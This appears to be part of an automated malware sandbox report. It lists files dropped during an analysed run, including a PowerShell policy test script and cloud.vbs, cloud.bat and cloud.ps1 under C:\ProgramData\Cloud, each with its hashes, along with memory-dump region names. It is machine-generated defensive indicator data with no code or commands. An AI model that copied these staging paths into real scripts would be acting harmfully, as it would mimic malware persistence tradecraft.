C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wkwdduoj.l4u.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2096-11-0x00007FFF67960000-0x00007FFF68421000-memory.dmp
memory/2096-12-0x00007FFF67960000-0x00007FFF68421000-memory.dmp
memory/2096-22-0x00007FFF67963000-0x00007FFF67965000-memory.dmp
memory/2096-23-0x00007FFF67960000-0x00007FFF68421000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a6c9d692ed2826ecb12c09356e69cc09 |
| SHA1 | def728a6138cf083d8a7c61337f3c9dade41a37f |
| SHA256 | a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b |
| SHA512 | 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8d089c855358969266a3275f0ec4f955 |
| SHA1 | 5ce30b598cfa0c2008541b1b549673401971dc3d |
| SHA256 | e198883dc78657f44bae11e2de5f56bc0f41eb6440f73cd3d65c30878b858734 |
| SHA512 | f240dcfc7adcca3140cdc2f8f387ac2053a7fd6e5e474a4008cf38d03506f99e361a5d6e970480ab1155ad00531b9d9095ed2a502ad09e7e442cdf7bcf932320 |
memory/2096-32-0x00007FFF67960000-0x00007FFF68421000-memory.dmp
C:\ProgramData\Cloud\cloud.vbs
| MD5 | 7079642a22a106d0ed6f227cc70899ae |
| SHA1 | 60dd57af3518c0ea4104379ad233b5982b231283 |
| SHA256 | b098e1055dc3dd3156236ee515e5dfbefd746d84578197f2309968625b831724 |
| SHA512 | ca1e9e201785fa611520ee2585208fb0684fd338ff1ab1d515523e03677ac4ac1ca5353fdc17bcba4c6c39aa37f9be182c5f7187b8dd9520c8604a001bd69f80 |
C:\ProgramData\Cloud\cloud.bat
| MD5 | b8bdfc7895feaaacba3711d17be6778a |
| SHA1 | fa0bc12827b348fe540a13683897deb207650df7 |
| SHA256 | e209153dda335fec8fa021f1022c4f9fe041cb527c2b9068eb9ec911429f20a3 |
| SHA512 | ea91a8262eacba0bcd6f692b5141124d7fedc98507ad6ab71ade565b347fe328780221f6972cc5c98a9471662474bf8c93e1219d241ff5f90579f7f8e8dd5156 |
C:\ProgramData\Cloud\cloud.ps1
| MD5 | d93d9d8d63201a2e547d4e1dde62d6d7 |
| SHA1 | 5a2273543ad08d5f749c9c7ee60e0b703548b8e7 |
| SHA256 | f5811cd347fc2f2d538625c468ae7ecbd8d0c18db495b9d3701204f7a13a527e |
| SHA512 | 59de80b3ce3e5406a8e1f2544fabb50a7d95b037143652fc0084b8bfe864337e0d4ab3cd14ef3c8249944bdccf9e27dce3471d955fac278ff45a68d32320e699 |
memory/4324-46-0x000001E949270000-0x000001E94927E000-memory.dmp
memory/1148-47-0x0000000000C00000-0x0000000000C18000-memory.dmp
memory/1148-49-0x0000000005340000-0x0000000005356000-memory.dmp
memory/1148-50-0x0000000005C30000-0x00000000061D4000-memory.dmp
memory/1148-51-0x0000000005860000-0x00000000058F2000-memory.dmp
memory/1148-52-0x0000000005840000-0x000000000584A000-memory.dmp
memory/1148-53-0x0000000006420000-0x00000000064BC000-memory.dmp
memory/1148-54-0x00000000064C0000-0x0000000006526000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6a231d98910d30502b367311f00984ae |
| SHA1 | 880e79decf402444db13eba21fc8d72d6ca53cda |
| SHA256 | c46efe7d37e93f1efb6551392e296ea0b9e9fc4d021d58751057443327e275f9 |
| SHA512 | 0cefc49d3da428387feb558a3e098e083a5425b6108d7601a5c6601cbdc1feaf20acfa54bcb866ef343df53ac46beb9dce38177717785e7f5dbb5ceabd33a501 |